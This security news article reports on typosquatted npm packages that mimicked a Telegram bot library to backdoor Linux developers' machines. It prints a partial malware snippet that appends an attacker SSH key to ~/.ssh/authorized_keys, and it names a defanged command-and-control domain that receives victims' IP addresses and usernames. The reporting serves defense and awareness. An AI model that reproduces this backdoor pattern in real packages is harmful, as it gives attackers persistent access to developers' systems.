Malicious npm Packages Attacking Linux Developers to Install SSH Backdoors

A concerning new supply chain attack has emerged targeting Linux developers who work with Telegram’s bot ecosystem.

Discovered in early 2025, several malicious npm packages have been masquerading as legitimate Telegram bot libraries to deliver SSH backdoors and exfiltrate sensitive data from unsuspecting developers.

These typosquatted packages collectively accumulated approximately 300 downloads over several months, creating a significant security threat despite their relatively modest installation numbers.

The attack specifically targets the widely-used node-telegram-bot-api library, which boasts over 4.17 million downloads.

The malicious variants—node-telegram-utils, node-telegram-bots-api, and node-telegram-util—appear virtually identical to the legitimate package, copying its documentation, functionality, and even linking back to the authentic GitHub repository with its 19,000+ stars to enhance credibility and deceive developers.

Socket.dev researchers identified that these packages implement a sophisticated “starjacking” technique, where they link their homepage back to the legitimate GitHub repository to borrow trust from the original project’s reputation.

This deception makes the malicious packages particularly difficult to identify during casual inspection, as they display the same star count as the legitimate library.

Upon installation in a Linux environment, the malicious packages automatically execute a hidden function called addBotId() whenever the constructor is called.

This function performs a platform check and, if Linux is detected, proceeds with its malicious payload without requiring any user interaction.

The attack specifically targets developer environments where npm packages are frequently installed during project setup or maintenance.

Infection Mechanism and Persistence

The malware’s key capability lies in its SSH backdoor implementation.

When executed on Linux systems, the malicious code modifies the ~/.ssh/authorized_keys file by appending attacker-controlled SSH keys, creating a persistent access channel that survives package removal:-

async function addBotId() {
    const username = os.userInfo().username;
    const publicKey = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0eFAxoea78gXpURdj7ufXx1LVEOoVKawxRnwAghXH`;
    if (os.platform() === 'linux') {
        try {
            const ipAddress = await getBotId();
            const sshDir = path.join(os.homedir(), '.ssh');
            const authorizedKeysPath = path.join(sshDir, 'authorized_keys');
            // Code continues to add SSH keys and exfiltrate data

The malicious code enables attackers to gain unauthorized access.

The code not only injects multiple SSH keys for redundant access but also exfiltrates the victim’s IP address and username to a command-and-control server at solana[.]validator[.]blog, allowing attackers to inventory compromised systems for further exploitation or data theft.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy